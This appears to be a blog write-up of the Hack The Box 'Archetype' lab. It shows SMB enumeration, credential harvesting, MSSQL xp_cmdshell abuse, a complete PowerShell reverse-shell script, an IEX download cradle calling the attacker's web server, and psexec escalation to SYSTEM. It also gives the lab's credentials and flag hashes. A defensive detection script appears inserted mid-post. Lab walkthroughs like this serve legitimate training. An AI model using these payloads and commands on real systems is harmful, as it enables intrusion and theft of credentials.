Archetype

  • Admin
  • Aug 1, 2022
  • 4 min read

Enumeration


As always, let's start with nmap:

nmap -sV -sC IP

Replace IP with the IP of your target machine (Archetype).


The IP of the target machine changes regularly, so make sure you type the correct one. You can find it on your Hack The Box account.


We can see that port 445 is open, which is usually associated with file sharing (SMB). So let's find out if we can list the available shares using:

smbclient -L IP

SMB authentication always requires a username. If you don't specify one, it will use your VM username by default.


When prompted for the password, just press enter.


We can see there are 4 shares available. Let's check the first share, called ADMIN$:

smbclient \\\\IP\\ADMIN$

When prompted for the password, just press enter.


Access is denied.

Let's check the second share, called backups:

smbclient \\\\IP\\backups

When prompted for the password, just press enter.


We got access to that share!

ls

Let's download the file prod.dtsConfig to our VM:

get prod.dtsConfig

The get command downloads the file to the directory you launched smbclient from (here, your home directory). Open your home directory and check the content of that file.


Looks like we found some credentials:

User ID=ARCHETYPE\sql_svc

Password=M3g4c0rp123


To exit the share, just type:

exit

Let's move on. The nmap scan we ran at the beginning also showed that port 1433 is open, which is usually associated with Microsoft SQL Server. Now that we have some credentials, we just need a way to connect and authenticate to the MSSQL server. Let's use Impacket's mssqlclient.py for that.

locate mssqlclient

Let's change directory:

cd /usr/share/doc/python3-impacket/examples

python3 mssqlclient.py

This tells us that we need to type username@targetIP.

This also tells us that we need to add the -windows-auth flag.


python3 mssqlclient.py sql_svc@IP -windows-auth

Type the password we found earlier:

M3g4c0rp123


We successfully authenticated to the Microsoft SQL server!

help

Looks like we can use xp_cmdshell followed by the command we want to execute, in the form xp_cmdshell {cmd}.


First, we need to enable it by typing:

enable_xp_cmdshell

We are told to run the RECONFIGURE statement to install it:

RECONFIGURE

Now we can use xp_cmdshell followed by the command we want to execute:

xp_cmdshell whoami

Now let's find out whether we have sysadmin rights by typing:

SELECT IS_SRVROLEMEMBER ('sysadmin')

The output is 1, which means we are a member of the sysadmin server role!
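From the defender's side, here is an added example (not part of the original post) of detection logic for the steps above: it flags the SQL Server error-log message written when xp_cmdshell is enabled, and process-creation events where sqlservr.exe spawns cmd.exe or PowerShell or a process runs a download cradle. The log lines, events and SQL Server install path are constructed.

```python
# Added example, not from the original post: detection logic for the steps shown
# above, run over constructed sample telemetry. Two signals are checked:
#   1. the SQL Server error-log message written when xp_cmdshell is switched on;
#   2. process-creation events where sqlservr.exe spawns cmd.exe or PowerShell.
import re

# Constructed ERRORLOG lines (the option-change message is SQL Server's own wording).
SAMPLE_ERRORLOG = """\
2022-08-01 10:02:11.54 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-08-01 10:02:11.60 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-08-01 10:03:02.01 spid51      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# Constructed process-creation events (the fields a 4688/Sysmon-style record carries);
# the SQL Server install path is an assumption.
SAMPLE_PROCESS_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.11:8080/shell.ps1");'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

ENABLE_RE = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")
CRADLE_RE = re.compile(r"Net\.WebClient|DownloadString|\bIEX\b|Invoke-Expression", re.I)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def detect_xp_cmdshell_enable(errorlog):
    """Return the timestamp of every line that records xp_cmdshell being enabled."""
    return [" ".join(line.split()[:2])
            for line in errorlog.splitlines() if ENABLE_RE.search(line)]


def detect_sql_spawned_shells(events):
    """Flag shells spawned by sqlservr.exe and any process running a download cradle."""
    alerts = []
    for ev in events:
        parent = ev["parent"].rsplit("\\", 1)[-1].lower()
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if parent == "sqlservr.exe" and image in SHELLS:
            alerts.append(("sqlservr_spawned_shell", ev["cmdline"]))
        if CRADLE_RE.search(ev["cmdline"]):
            alerts.append(("powershell_download_cradle", ev["cmdline"]))
    return alerts
```

The second rule deliberately ignores the parent: on this box the cradle is a grandchild of sqlservr.exe (sqlservr.exe > cmd.exe > powershell.exe), so keying only on the direct parent would miss it.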




We just need to change 2 things in the script:

- The IP ---> this is the IP of your VM (the attacker's machine)

If you don't know your IP, open a new command prompt window and type ifconfig.

- The port number ---> this is the port on which you will listen using netcat. We will start our netcat listener on port 4444.

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.11",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Go to your Downloads folder and create a new file called shell.ps1.

Open it, copy-paste the script above, then save the file.


Now we need to get the target machine to download our PowerShell script shell.ps1.


To do that, we will create a simple web server on our attacker machine (our VM).


From your VM, open a new command prompt window and go to the Downloads directory:

cd Downloads
sudo python3 -m http.server 8080

This command starts a web server serving the current directory (in this case the Downloads directory).

Do not close this window! Otherwise it will stop your web server.


Open your browser and check that the web server is reachable:

http://10.10.14.11:8080/

10.10.14.11 is the IP of my VM - it will be different for you. Make sure you type your VM's IP. If you don't know the IP of your VM, open a new command prompt window and type ifconfig.


Now we need to install ufw (uncomplicated firewall) on our VM.

Open a new command prompt window and type:

sudo apt install ufw

sudo ufw enable

We now need to add a rule so that the target machine can connect back to our attacker machine (our VM):

sudo ufw allow from 10.129.243.63 proto tcp to any port 8080,4444

10.129.243.63 is the target machine.

Port 8080 because our web server is on port 8080.

Port 4444 because we will start our netcat listener on port 4444.



Now, still from your VM, open a new command prompt window and set up your netcat listener:

nc -lnvp 4444

Only after your netcat listener is running, go back to the target machine and type:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.11:8080/shell.ps1\");"

10.10.14.11 is the IP of my VM (attacker's machine) - the IP of your VM will be different. If you don't know the IP of your VM, open a new command prompt window and type ifconfig.


Go back to your netcat and you should have a connection:


Type:

whoami

cd C:\Users

dir

cd sql_svc

dir

cd Desktop

dir

type user.txt

3e7b102e78218e935bf3f4951fec21a3


You got the user flag! Congratulations!



It's always worth checking the PowerShell console history file, which records the commands a user previously executed (and, through them, the files they worked with). The history file is called ConsoleHost_history.txt and can be found in this directory: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine


cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\Powershell\PSReadLine
cat ConsoleHost_history.txt

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!


We just found more credentials!


The net use (or net.exe use) command maps a drive letter to a shared resource and shows detailed information about currently mapped drives and devices. It is used this way:

net use [{devicename | *}] \\computername\sharename /user:username [password]

devicename ---> specifies the drive letter (here drive letter T)

\\computername\sharename ---> specifies the name of the computer, computername, and the shared resource, sharename

/user:username [password] ---> the account to authenticate as; a password typed here on the command line is what ended up recorded in the history file


More info on net use can be found at https://www.lifewire.com/net-use-command-2618096




Privilege Escalation


Impacket also has a tool called psexec.py, which we can use to connect to the server with the credentials we just found.


From your VM, open a new prompt window:

locate psexec.py

cd /usr/share/doc/python3-impacket/examples

python3 psexec.py

python3 psexec.py administrator@10.129.243.63

10.129.243.63 is the IP of the target machine.

Type the password we just found and press enter:

MEGACORP_4dm1n!!


whoami

We just escalated our privileges and are now NT AUTHORITY\SYSTEM.


You can usually find the root flag at C:\Users\Administrator\Desktop:

cd C:\Users\Administrator\Desktop

dir

type root.txt

b91ccec3305e98240082d4474b848528


Congratulations! You got the root flag!

©2025 by My Tech On IT